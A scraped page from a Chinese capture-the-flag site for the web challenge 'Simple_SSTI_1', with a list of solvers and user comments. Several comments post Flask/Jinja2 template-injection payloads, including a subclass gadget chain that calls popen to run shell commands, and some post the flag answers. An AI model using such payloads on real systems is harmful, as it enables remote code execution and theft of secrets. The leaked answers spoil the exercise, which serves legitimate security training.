Simple_SSTI_1WEB 未解决
分数:
5
金币:
2
题目作者:
valecalida
一 血:
dotast
一血奖励:
2金币
解 决:
28736
提 示:
描 述:
Simple_SSTI_1
评分(50)
解题动态
everystep 攻破了该题 13小时前
爱喝畅汁 攻破了该题 13小时前
Tylione 攻破了该题 1天前
lx723823 攻破了该题 2天前
Asher 攻破了该题 2天前
hyj11125 攻破了该题 2天前
时倾77 攻破了该题 2天前
Aurora* 攻破了该题 2天前
lizhibin 攻破了该题 2天前
lee8ly 攻破了该题 3天前
Sonetto 攻破了该题 3天前
Wendmin 攻破了该题 3天前
lmz123 攻破了该题 3天前
CD123456 攻破了该题 3天前
3121834271 攻破了该题 4天前
SamJij 攻破了该题 4天前
林蔓露 攻破了该题 5天前
Ash_1070 攻破了该题 6天前
Aromatic 攻破了该题 7天前
评论
2027347950 2年前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
iii1 2年前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
DragonWE 2年前
举报
flag{9c260fb48e0a0db7708b6f3ebe9ff732}
iain4048 2年前
举报
查看源代码提示找secret key value
13663536751 2年前
举报
flag{e0ad0234936fcd15f11c7bb0f9d587e7}
2346254613 2年前
举报
这个是答案吗
啊这这 2年前
举报
使用{{config}}获得flag,因为config是用来获取当前配置的,配置主要有cookie名字和值之类的,这里的flag就是存放在cookie中(个人理解,如果不对请矫正)
avengert 2年前
举报
你们这么泄题,一会儿不得刷一轮儿了啊。
xbhgg 2年前
举报
大神们怎么知道的参数里面放的是config。。。
justsosoloveyou 2年前
举报
POC: /?flag={{config}} 或 /?flag={{config.SECRET_KEY}} 原理:SSTI 就是服务器端模板注入(Server-Side Template Injection),可以获取前端传入参数的值进行处理,类似于 {{}} 的变量经过引擎解析的时候,进行了执行,然后渲染并填充到web页面。 思路:页面提示flag参数,源码注释提示secret_key参
Komorebi41 2年前
举报
在网址后面加上: /?flag={{config.SECRET_KEY}}的原因:flask的模板注入.flask会把类似于 {]的变量当做参数来渲染并填充到web页面,且根据F12后代码提示,我们知道是在config.secret_key中的